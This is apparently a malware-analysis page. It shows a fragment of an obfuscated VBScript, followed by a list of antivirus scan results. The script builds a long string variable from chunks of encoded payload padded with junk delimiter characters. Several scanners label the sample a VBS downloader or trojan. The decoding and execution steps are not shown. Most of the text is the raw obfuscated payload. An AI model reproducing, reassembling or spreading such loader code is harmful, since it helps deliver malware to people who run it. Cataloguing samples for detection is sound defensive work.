RNhrp = RNhrp & "#%Qy@@&&^%^#%CQ1@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%I@@&&^%^#%JM@@&&^%^#%ERRpBDI@@&&^%^#%"
RNhrp = RNhrp & "RDU@@&&^%^#%@@&&^%^#%@@&&^%^#%g@@&&^%^#%"
RNhrp = RNhrp & "kw@@&&^%^#%8FH8EMgBUNQ@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "C@@&&^%^#%CT@@&&^%^#%FkU5@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%y@@&&^%^#%GQ1@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%I@@&&^%^#%JM@@&&^%^#%bRR/BDI@@&&^%^#%"
RNhrp = RNhrp & "dDU@@&&^%^#%@@&&^%^#%@@&&^%^#%g@@&&^%^#%"
RNhrp = RNhrp & "kwCQFOQ@@&&^%^#%MgCENQ@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "C@@&&^%^#%CT@@&&^%^#%KkUCQEy@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%QDFB@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%QD+B@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%QD+B@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%QBBBw@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%QBiC@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%gBoC@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%wBwC@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%QCoDw@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%gC4Dw@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%wDLDw@@&&^%^#%@@&&^%^#%B@@&&^%^"
RNhrp = RNhrp & "#%DdDw@@&&^%^#%@@&&^%^#%BQDuDw@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%Bg@@&&^%^#%EE@@&&^%^#%@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%Bw@@&&^%^#%SE@@&&^%^#%@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%C@@&&^%^#%@@&&^%^#%eE@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%CQ@@&&^%^#%vE@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%Cg@@&&^%^#%7E@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%QB+E@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%gCFE@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%QB+E@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%gCFE@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%QB+E@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%gCFE@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%QB+E@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%gCFE@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%Q@@&&^%^#%6EQ@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%gBCEQ@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%wBOEQ@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "B@@&&^%^#%BVEQ@@&&^%^#%@@&&^%^#%BQBgEQ@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%Q@@&&^%^#%6EQ@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%gBCEQ@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%wBOEQ@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "B@@&&^%^#%BVEQ@@&&^%^#%@@&&^%^#%BQCTEQ@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%Q@@&&^%^#%6EQ@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%gBCEQ@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%QD+EQ@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%g@@&&^%^#%FEg@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%w@@&&^%^#%NEg@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "B@@&&^%^#%@@&&^%^#%UEg@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "BQ@@&&^%^#%ZEg@@&&^%^#%@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%QD+EQ@@&&^%^#%@@&&^%^#%@@&&^%^#%QBTEg@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%QBvEg@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%gB0Eg@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%wBTEg@@&&^%^#%@@&&^%^#%B@@&&^%^"
RNhrp = RNhrp & "#%B4Eg@@&&^%^#%@@&&^%^#%B@@&&^%^#%B4Egk@"
RNhrp = RNhrp & "@&&^%^#%U@@&&^%^#%@@&&^%^#%T@@&&^%^#%Ck@"
RNhrp = RNhrp & "@&&^%^#%U@@&&^%^#%@@&&^%^#%3@@&&^%^#%DE@"
RNhrp = RNhrp & "@&&^%^#%U@@&&^%^#%BE@@&&^%^#%EE@@&&^%^#%"
RNhrp = RNhrp & "U@@&&^%^#%BQ@@&&^%^#%FE@@&&^%^#%U@@&&^%^"
RNhrp = RNhrp & "#%BQ@@&&^%^#%Fk@@&&^%^#%U@@&&^%^#%BQ@@&&"
RNhrp = RNhrp & "^%^#%GE@@&&^%^#%U@@&&^%^#%BQ@@&&^%^#%Gk@"
RNhrp = RNhrp & "@&&^%^#%U@@&&^%^#%BQ@@&&^%^#%HE@@&&^%^#%"
RNhrp = RNhrp & "U@@&&^%^#%BQ@@&&^%^#%Hk@@&&^%^#%U@@&&^%^"
RNhrp = RNhrp & "#%BV@@&&^%^#%IE@@&&^%^#%U@@&&^%^#%BQ@@&&"
RNhrp = RNhrp & "^%^#%Ik@@&&^%^#%U@@&&^%^#%BQ@@&&^%^#%JE@"
RNhrp = RNhrp & "@&&^%^#%U@@&&^%^#%BQ@@&&^%^#%KE@@&&^%^#%"
RNhrp = RNhrp & "U@@&&^%^#%@@&&^%^#%3@@&&^%^#%Kk@@&&^%^#%"
RNhrp = RNhrp & "U@@&&^%^#%@@&&^%^#%3@@&&^%^#%@@&&^%^#%w@"
RNhrp = RNhrp & "@&&^%^#%U@@&&^%^#%@@&&^%^#%3@@&&^%^#%BQ@"
RNhrp = RNhrp & "@&&^%^#%U@@&&^%^#%@@&&^%^#%3@@&&^%^#%Bw@"
RNhrp = RNhrp & "@&&^%^#%U@@&&^%^#%@@&&^%^#%3@@&&^%^#%CQ@"
RNhrp = RNhrp & "@&&^%^#%U@@&&^%^#%@@&&^%^#%3@@&&^%^#%BQ@"
RNhrp = RNhrp & "@&&^%^#%RwQy@@&&^%^#%Qw@@&&^%^#%RwQy@@&&"
RNhrp = RNhrp & "^%^#%Rw@@&&^%^#%RwQy@@&&^%^#%SQ@@&&^%^#%"
RNhrp = RNhrp & "RwQy@@&&^%^#%dE@@&&^%^#%EQW@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%dk@@&&^%^#%VwWT@@&&^%^#%Zk@@&&^%^#%"
RNhrp = RNhrp & "vgRe@@&&^%^#%Zk@@&&^%^#%xwRj@@&&^%^#%ck@"
RNhrp = RNhrp & "@&&^%^#%3@@&&^%^#%Wj@@&&^%^#%Zk@@&&^%^#%"
RNhrp = RNhrp & "4@@&&^%^#%Rs@@&&^%^#%Zk@@&&^%^#%U@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%3@@&&^%^#%DQ@@&&^%^#%Fgaq@@&&"
RNhrp = RNhrp & "^%^#%Tw@@&&^%^#%WQYy@@&&^%^#%Tw@@&&^%^#%"
RNhrp = RNhrp & "YwbN@@&&^%^#%Tw@@&&^%^#%U@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%3@@&&^%^#%Mk@@&&^%^#%8gbg@@&&^%^#%fE@"
RNhrp = RNhrp & "@&&^%^#%U@@&&^%^#%Dl@@&&^%^#%Zk@@&&^%^#%"
RNhrp = RNhrp & "WgeY@@&&^%^#%QkB5wcG@@&&^%^#%rE@@&&^%^#%"
RNhrp = RNhrp & "U@@&&^%^#%@@&&^%^#%3@@&&^%^#%DEBU@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%3@@&&^%^#%DkB8@@&&^%^#%hF@@&&"
RNhrp = RNhrp & "^%^#%kkBU@@&&^%^#%@@&&^%^#%3@@&&^%^#%CEB"
RNhrp = RNhrp & "U@@&&^%^#%@@&&^%^#%3@@&&^%^#%FEBLglV@@&&"
RNhrp = RNhrp & "^%^#%jkBOgla@@&&^%^#%lkBU@@&&^%^#%BQ@@&&"
RNhrp = RNhrp & "^%^#%HEBswlu@@&&^%^#%nkB8@@&&^%^#%l1@@&&"
RNhrp = RNhrp & "^%^#%jEBD@@&&^%^#%qB@@&&^%^#%oEBN@@&&^%^"
RNhrp = RNhrp & "#%qI@@&&^%^#%kk@@&&^%^#%UgqU@@&&^%^#%kk@"
RNhrp = RNhrp & "@&&^%^#%4@@&&^%^#%Rs@@&&^%^#%TEBg@@&&^%^"
RNhrp = RNhrp & "#%qg@@&&^%^#%okB0wqs@@&&^%^#%pkBDgu6@@&&"
RNhrp = RNhrp & "^%^#%hkBLwvB@@&&^%^#%kk@@&&^%^#%SgvP@@&&"
RNhrp = RNhrp & "^%^#%qEBbgvX@@&&^%^#%iEBnQvm@@&&^%^#%iEB"
RNhrp = RNhrp & "w@@&&^%^#%tQ@@&&^%^#%Ek@@&&^%^#%Sgvt@@&&"
RNhrp = RNhrp & "^%^#%iEB8wtQ@@&&^%^#%EkBF@@&&^%^#%zz@@&&"
RNhrp = RNhrp & "^%^#%kkBNQz/@@&&^%^#%hEBTgwK@@&&^%^#%xEB"
RNhrp = RNhrp & "b@@&&^%^#%wS@@&&^%^#%xEBjQwe@@&&^%^#%xEB"
RNhrp = RNhrp & "qQw3@@&&^%^#%LEBygwk@@&&^%^#%1kBbgsq@@&&"
RNhrp = RNhrp & "^%^#%0k@@&&^%^#%Sgsy@@&&^%^#%8EBO@@&&^%^"
RNhrp = RNhrp & "#%05@@&&^%^#%8kBdw0/@@&&^%^#%8kBmg0J@@&&"
RNhrp = RNhrp & "^%^#%dEBzg1S@@&&^%^#%9kB4@@&&^%^#%Rj@@&&"
RNhrp = RNhrp & "^%^#%+EBDQ6I@@&&^%^#%kk@@&&^%^#%P@@&&^%^"
RNhrp = RNhrp & "#%5o@@&&^%^#%+EBVg7t@@&&^%^#%ukBdw5v@@&&"
RNhrp = RNhrp & "^%^#%9kBpg50@@&&^%^#%9EBxQ6G@@&&^%^#%+EB"
RNhrp = RNhrp & "Vg7P@@&&^%^#%uEB9Q6I@@&&^%^#%uEBFQ+I@@&&"
RNhrp = RNhrp & "^%^#%tEBOg+i@@&&^%^#%/EBXw+e@@&&^%^#%Uk@"
RNhrp = RNhrp & "@&&^%^#%WBIIB@@&&^%^#%kCU@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%3@@&&^%^#%GEBU@@&&^%^#%BQ@@&&^%^#%CkB"
RNhrp = RNhrp & "U@@&&^%^#%@@&&^%^#%3@@&&^%^#%PkBgxI3B@@&"
RNhrp = RNhrp & "&^%^#%kCsBJ@@&&^%^#%BBEC7BI3@@&&^%^#%Ek@"
RNhrp = RNhrp & "@&&^%^#%P@@&&^%^#%5FBPEBbBNLBEk@@&&^%^#%"
RNhrp = RNhrp & "hxNv@@&&^%^#%xkCyhNRBPkB5hNYBBkCCRRiBCkC"
RNhrp = RNhrp & "LBRyBBkCUBSEBEkBgRSKBEkBpBQ3@@&&^%^#%DkC"
RNhrp = RNhrp & "U@@&&^%^#%CzBEECU@@&&^%^#%DCBFECU@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%3@@&&^%^#%FkCU@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%3@@&&^%^#%GECU@@&&^%^#%@@&&^%^#%3@@&&"
Antivirus Signature
Bkav Clean
Lionic Clean
MicroWorld-eScan Clean
FireEye Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Clean
Symantec ISB.Heuristic!gen62
Cynet Malicious (score: 99)
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Sophos Clean
F-Secure Malware.VBS/YAV.Minerva.vvhpi
DrWeb Trojan.InjectNET.14
Zillya Clean
McAfee-GW-Edition VBS/Downloader.acb
CMC Clean
Emsisoft Clean
Ikarus Trojan.VBS.Agent
Jiangmin Clean
Avira VBS/YAV.Minerva.vvhpi
Antiy-AVL Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Google Detected
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
MAX Clean
Zoner Clean
Tencent Clean
Yandex Clean
MaxSecure Clean
Panda Clean
No IRMA results available.